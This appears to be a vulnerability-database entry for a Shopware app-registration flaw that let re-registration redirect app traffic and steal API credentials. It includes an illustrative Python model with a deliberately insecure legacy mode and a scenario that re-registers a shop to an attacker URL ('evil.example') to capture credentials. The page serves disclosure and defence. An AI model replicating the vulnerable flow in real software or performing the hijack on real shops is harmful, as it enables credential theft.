Shopware has a potential take over of app credentials
Description
Shopware is an open commerce platform. Prior to 6.6.10.15 and 6.7.8.1, a vulnerability in the Shopware app registration flow could, under specific conditions, allow attackers to take over the communication channel between a shop and an app. The legacy app registration flow used HMAC-based authentication without sufficiently binding a shop installation to its original domain. During re-registration, the shop-url could be updated without proving control over the previously registered shop or domain. This made targeted hijacking of app communication feasible if an attacker possessed the relevant app-side secret. By abusing app re-registration, an attacker could redirect app traffic to an attacker-controlled domain and potentially obtain API credentials intended for the legitimate shop. This vulnerability is fixed in 6.6.10.15 and 6.7.8.1.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Shopware app registration flow allows domain hijacking during re-registration, enabling attackers to redirect app traffic and steal API credentials.
Vulnerability
The vulnerability resides in the Shopware app registration flow, prior to versions 6.6.10.15 and 6.7.8.1 [1]. The legacy HMAC-based authentication did not sufficiently bind a shop installation to its original domain. During re-registration, the shop-url could be updated without proving continued control over the previously registered domain [1][3]. This allowed an attacker with knowledge of the app-side secret to hijack the communication channel between a shop and its app [3].
Exploitation
To exploit this vulnerability, an attacker must possess the relevant app-side secret—such as that used in HMAC signing during the legacy registration flow [1][3]. By abusing the re-registration process, the attacker can update the shop's registered URL to a domain under their control. This does not require authentication as the shop owner and no proof of domain control is needed during the re-registration step [3]. The attack targets the app system's registration mechanism, not core storefront or administration authentication, so exploitation may go unnoticed as an 'app malfunction' [3].
Impact
A successful attack allows the attacker to register an existing app installation under a domain they control, enabling interception of App-to-Shop communication [3]. This can lead to data tampering ('data poisoning') and the theft of API integration credentials that grant the permissions originally assigned to the app [3]. The compromise is limited to the app ecosystem but can expose sensitive shop data and functionality depending on the app's permissions [3].
Mitigation
Shopware has fixed the vulnerability in versions 6.6.10.15 and 6.7.8.1 by hardening the registration and re-registration process, including adding a dual signature requirement and other binding controls [1][3]. Users are advised to update immediately. As an interim measure, cloud installations can rely on the latest Shopware Security Plugin [3]. Shopware services and first-party apps using the affected SDKs have also been reviewed and patched [3].
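The Exploitation and Mitigation paragraphs above describe the same mechanism from two sides: the legacy flow accepts a re-registration for a known shop-id on the strength of the shared app secret alone, while the fix demands a second proof bound to the existing installation. The following model is an added example written for this page; it is not Shopware's code or its app SDK. The query-string canonicalisation, the header names, the in-memory shop store, the behaviour of keeping stored integration credentials while overwriting the shop-url, and the choice of a second HMAC under the per-shop secret as the "dual signature" are all assumptions made for illustration; the advisory does not spell out the exact binding controls.

```python
# Added example, not Shopware's code: a minimal model of an app-side registration
# endpoint showing the legacy re-registration weakness and a second-signature fix.
from __future__ import annotations

import hashlib
import hmac
import secrets
from dataclasses import dataclass
from urllib.parse import parse_qsl, urlencode

APP_NAME = "ExampleApp"                   # assumed app name
APP_SECRET = "app-secret-from-manifest"   # assumed shared app secret; the attacker is assumed to hold it


def sign(secret: str, message: str) -> str:
    """HMAC-SHA256 hex digest, the primitive the registration flow is built on."""
    return hmac.new(secret.encode(), message.encode(), hashlib.sha256).hexdigest()


def registration_query(shop_id: str, shop_url: str, timestamp: int) -> str:
    """Query string a shop sends to the app's registration URL (field names follow the
    Shopware manifest flow; the exact canonicalisation is an assumption)."""
    return urlencode({"shop-id": shop_id, "shop-url": shop_url, "timestamp": timestamp})


@dataclass
class ShopRecord:
    shop_url: str
    shop_secret: str           # secret the app issued to this shop at first registration
    api_key: str = ""          # integration credentials received at confirmation
    secret_key: str = ""


class AppServer:
    """In-memory app server. require_shop_signature=False models the legacy flow."""

    def __init__(self, require_shop_signature: bool):
        self.require_shop_signature = require_shop_signature
        self.shops: dict[str, ShopRecord] = {}

    def register(self, query: str, app_signature: str, shop_signature: str | None = None) -> dict:
        # Both variants: the request must be signed with the shared app secret.
        if not hmac.compare_digest(sign(APP_SECRET, query), app_signature):
            raise PermissionError("invalid shopware-app-signature")
        params = dict(parse_qsl(query))
        shop_id, shop_url = params["shop-id"], params["shop-url"]
        existing = self.shops.get(shop_id)

        if existing is not None and self.require_shop_signature:
            # Hardened variant (assumed design): a re-registration for a known shop-id
            # must also be signed with the per-shop secret issued earlier. Only the shop
            # that completed the original registration holds it, so the app secret
            # alone can no longer move the shop-url.
            if shop_signature is None or not hmac.compare_digest(
                sign(existing.shop_secret, query), shop_signature
            ):
                raise PermissionError("re-registration requires proof of the existing shop secret")

        if existing is None:
            record = ShopRecord(shop_url=shop_url, shop_secret=secrets.token_hex(16))
        else:
            # Legacy behaviour being modelled: the shop-url is overwritten while the
            # stored integration credentials are kept and will follow the new URL.
            record = ShopRecord(shop_url, existing.shop_secret, existing.api_key, existing.secret_key)
        self.shops[shop_id] = record
        return {"proof": sign(APP_SECRET, shop_id + shop_url + APP_NAME), "secret": record.shop_secret}

    def confirm(self, shop_id: str, api_key: str, secret_key: str) -> None:
        """Confirmation step: the shop hands its integration credentials to the app."""
        self.shops[shop_id].api_key = api_key
        self.shops[shop_id].secret_key = secret_key

    def token_endpoint(self, shop_id: str) -> str:
        """Where the app will send the stored integration credentials for an OAuth token."""
        return self.shops[shop_id].shop_url + "/api/oauth/token"


def run_scenario(hardened: bool) -> str:
    """Legitimate shop registers and confirms; then an attacker holding only the app
    secret submits a registration for the same shop-id with an attacker-controlled URL.
    Returns the token endpoint the app would use afterwards."""
    app = AppServer(require_shop_signature=hardened)
    victim_id, victim_url = "shop-1234", "https://shop.example"      # constructed sample data
    q = registration_query(victim_id, victim_url, 1700000000)
    app.register(q, sign(APP_SECRET, q))
    app.confirm(victim_id, "SWIAEXAMPLEKEY", "integration-secret")

    evil_q = registration_query(victim_id, "https://evil.example", 1700000600)
    try:
        app.register(evil_q, sign(APP_SECRET, evil_q))   # attacker has no shop_secret to sign with
    except PermissionError:
        pass
    return app.token_endpoint(victim_id)
```

With `hardened=False` the app's next token request carries the victim's integration credentials to `https://evil.example/api/oauth/token`; with `hardened=True` the forged re-registration is rejected and traffic keeps flowing to `https://shop.example`. A shop that legitimately changes domain still succeeds on the hardened server because it can sign the new query with the secret it received at first registration.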
AI Insight generated on May 18, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Ecosystem | Affected versions | Patched versions |
|---|---|---|---|
| shopware/platform | Packagist | >= 6.7.0.0, < 6.7.8.1 | 6.7.8.1 |
| shopware/platform | Packagist | < 6.6.10.15 | 6.6.10.15 |
| shopware/core | Packagist | >= 6.7.0.0, < 6.7.8.1 | 6.7.8.1 |
| shopware/core | Packagist | < 6.6.10.15 | 6.6.10.15 |
Affected products
- shopware/core (v5 range): >= 6.7.0.0, < 6.7.8.1
- shopware/platform (v5 range): >= 6.7.0.0, < 6.7.8.1
Patches
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
- [1] github.com/advisories/GHSA-c4p7-rwrg-pf6p (ghsa, ADVISORY)
- [2] nvd.nist.gov/vuln/detail/CVE-2026-31889 (ghsa, ADVISORY)
- [3] github.com/shopware/shopware/security/advisories/GHSA-c4p7-rwrg-pf6p (ghsa, x_refsource_CONFIRM, WEB)
News mentions
No linked articles in our index yet.